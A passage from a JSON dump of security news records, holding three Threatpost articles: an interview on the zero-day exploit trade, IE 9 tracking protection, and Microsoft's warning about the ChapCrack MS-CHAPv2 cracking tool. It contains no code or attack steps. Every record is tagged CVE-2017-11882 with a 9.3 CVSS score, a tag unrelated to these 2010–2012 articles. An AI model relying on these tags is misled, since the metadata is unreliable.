Paul Roberts, Chris switched focus from consumer protections from advertisers, to the fast-growing market for surveillance products.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2012/04/07052336/chris_soghoian-_part2.mp3>\n\nAs Soghoian sees it, the public sector \u2013 both government and law enforcement \u2013 have abrogated their responsibility to protect consumers from online predation. Why, you might ask? In Soghoian\u2019s view, the government turns a blind eye to insecure computers because those same insecure systems might provide access to law enforcement or intelligence services, should they need it.\n\nIts a daring claim, and one that\u2019s difficult to prove, because so much of the dealing in undocumented (\u201czero day\u201d) software vulnerabilities happens behind the scenes. Even published reports about information on exploitable holes in popular devices (like the [recent Forbes report about an Apple iOS zero day that sold for $250,000](<http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/>)) are often attributed to unnamed sources and impossible to verify. What is clear, Soghoian says, is that the discovery and publication of information on software holes in popular platforms [like Internet Explorer](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) has gone from an open and mostly volunteer activity by a small cadre of experts to a burgeoning and mostly underground market between researchers and software firms or, increasingly, indepedent middlemen. The market itself is worth tens- if not hundreds of millions of dollars.\n\nSoghoian said the public expects intelligence agencies to engage in digital spycraft.\n\n\u201cI\u2019m not nieve enough to believe governments can be stopped from doing this,\u201d Soghoian said. \u201cNSA is always going to be able to hack into people\u2019s systems and there\u2019s nothing we can do to stop this.\u201d\n\nBut the global trade in exploits by private firms, [such as Vupen Security](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) and other firms is another matter, he claims.\n\n\u201cIf you think of our own intelligence agencies can be trusted, maybe you don\u2019t think foreign intelligence agencies can. And U.S. middleman firms are providing these flaws to these agencies.\u201d\n\nSoghoian is not the first authority to raise the red flag on for profit vulnerability and exploit sales. At the CANSECWEST security show in Vancouver, [Chaouki Bekrar of VUPEN security defended his company\u2019s sales of exploitable security holes to private customers](<https://threatpost.com/chaouki-bekrar-man-behind-bugs-030912/>). Bekrara told Threatpost at that show that VUPEN would be holding on to a memory corruption flaw in IE\u2019s protected mode sandbox for itself and its customers. It can be reused in combination with other bugs in IE for future sales, much to the consternation of security researchers.\n\nJust as troubling, Soghoian says, is the growing use of digital surveillance tools by even state and local authorities \u2013 a development that Soghoian finds troubling.\n\n\u201cThe Keystone cop is not an expert in information security,\u201d he said.\n\nRather than tolerate widespread insecurity on both laptop and mobile devices, governments \u2013 including the U.S. government \u2013 should use its full weight to encourage better online security, including automated patching and software updates to remove exploitable holes, he said.\n\nCheck out the rest of [Threatpost\u2019s interview with Chris Soghoian here](<https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/>).\n", "modified": "2013-07-18T19:20:47", "published": "2012-04-05T11:30:00", "id": "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "href": "https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/76400/", "type": "threatpost", "title": "Arms Race In Zero Days Spells Trouble For Privacy, Public Safety", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:31", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft has pushed out a new release candidate of Internet Explorer 9 that includes two new privacy protections designed to enable consumers to prevent tracking by some Web sites.\n\nThe new [IE 9 release candidate](<http://blogs.msdn.com/b/ie/archive/2010/12/07/ie9-and-privacy-introducing-tracking-protection-v8.aspx>) has two separate, but related, technologies aimed at giving users more control over how sites track them and what data is sent back to the site\u2019s owners: Tracking Protection and Tracking Protection Lists. The functionality allows user to specify exactly which sites they will allow to track them to some extent and enables sites to publish lists that show consumers what information might be collected.\n\nThe announcement by Microsoft comes in the midst of a complex discussion among lawmakers, regulators and privacy advocates about whether a national \u201cDo-Not Track\u201d list for browsers is desirable or even feasible. The [Federal Trade Commission recently proposed such a list](<https://threatpost.com/ftc-pushes-do-not-track-option-web-browsers-120110/>) in a report it released on privacy issues. Microsoft officials said that they were interested in finding a way to answer some of the same questions raised by the FTC.\n\n\u201cWe believe that the combination of consumer opt-in, an open platform for \npublishing of Tracking Protection Lists (TPLs), and the underlying \ntechnology mechanism for Tracking Protection offer new options and a \ngood balance between empowering consumers and online industry needs. \nThey further empower consumers and complement many of the other ideas \nunder discussion,\u201d Dean Hachamovitch, corporate vice president for IE at Microsoft wrote in a blog post about the new features. \u201cWhile \u2018Do not track\u2019 is a meaningful consumer promise around data use, the web lacks a good precise definition of [what tracking means](<http://www.research-live.com/ftc-chief-says-do-not-track-idea-is-still-on-the-table/4003244.article>). \nUntil we get there, we can make progress by providing consumers with a \nway to limit or control the data collected about them on sites they \ndon\u2019t visit directly. That kind of control is already technically \nfeasible today [in a variety of ways](<http://blogs.msdn.com/b/ie/archive/2010/11/30/selectively-filtering-content-in-web-browsers.aspx>). \nIt is important to understand that the feature design makes no judgment \nabout how information might be used. Rather, it provides the means for \nconsumers to opt-out of the release of that information in the first \nplace.\u201d\n\nThe new privacy mechanisms in IE 9 will be opt-in, so users will need to make conscious decisions about what sites they are blocking and which they are allowing to track them. Users will be able to manually add specific sites to the Tracking Protection mechanism and also can add Tracking Protection Lists published by various Web sites to their browsers. The TPLs will include URLs that the user only wants IE to call out to if the user actually types the address into the browser or clicks on a link to the site. \n\n\u201cIn addition to \u2018Do Not Call\u2019 entries that prevent information \nrequests to some web addresses, lists can include \u2018OK to Call\u2019 entries \nthat permit calls to specific addresses. In this way, a consumer can \nmake exceptions to restrictions on one list easily by adding another \nlist that includes \u2018OK to Call\u2019 overrides for particular addresses,\u201d Hachamovitch wrote. \u201cWe \ndesigned this feature so that consumers have a clear, straight forward, \nopt-in mechanism to enable a higher degree of control over sharing \ntheir browsing information AND websites can provide easy to use lists to \nmanage their privacy as well as experience full-featured sites.\u201d\n", "modified": "2013-04-17T16:35:34", "published": "2010-12-07T20:00:18", "id": "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "href": "https://threatpost.com/microsoft-adds-tracking-protection-ie-9-120710/74747/", "type": "threatpost", "title": "Microsoft Adds Tracking Protection to IE 9", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:24", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft is warning customers about the availability of the [ChapCrack tool that Moxie Marlinspike built](<https://threatpost.com/new-tool-moxie-marlinspike-cracks-some-crypto-passwords-073012/>) to crack the VPN credentials for systems built on MS-CHAPv2 protocol. The company said that while it\u2019s not aware of any active attacks using the tool, customers can protect themselves by implementing PEAP or changing to a more secure VPN tunnel.\n\nMarlinspike unveiled the ChapCrack tool at DEF CON last month, and it\u2019s designed to take packet captures from sessions using the MS-CHAPv2 protocol and strip out the user\u2019s credentials from the cryptographic handshake in the session. In order to decrypt the user\u2019s credentials, Marlinspike submits the packet to CloudCracker, which sends back a packet that he can put back into ChapCrack, which then will crack the password.\n\nIn its advisory, Microsoft says that while the ChapCrack tool doesn\u2019t take advantage of a security vulnerability per se, it still represents a risk to users.\n\n\u201cAn attacker who successfully exploited these cryptographic weaknesses could obtain user credentials. Those credentials could then be re-used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that network resource,\u201d the company said in its [advisory on ChapCrack](<http://technet.microsoft.com/en-us/security/advisory/2743314>).\n\n\u201cAn attacker has to be able to intercept the victim\u2019s MS-CHAP v2 handshake in order to exploit this weakness, by performing man-in-the-middle attacks or by intercepting open wireless traffic. An attacker who obtained the MS-CHAP v2 authentication traffic could then use the exploit code to decrypt a user\u2019s credentials.\u201d\n\nMicrosoft recommends that customers who use MS-CHAPv2 implement PEAP (protected extensible authentication protocol) to further secure their VPNs. \n", "modified": "2013-04-17T16:31:41", "published": "2012-08-20T19:11:41", "id": "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "href": "https://threatpost.com/microsoft-warns-users-about-chapcrack-tool-availability-082012/76929/", "type": "threatpost", "title": "Microsoft Warns Users About ChapCrack Tool Availability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}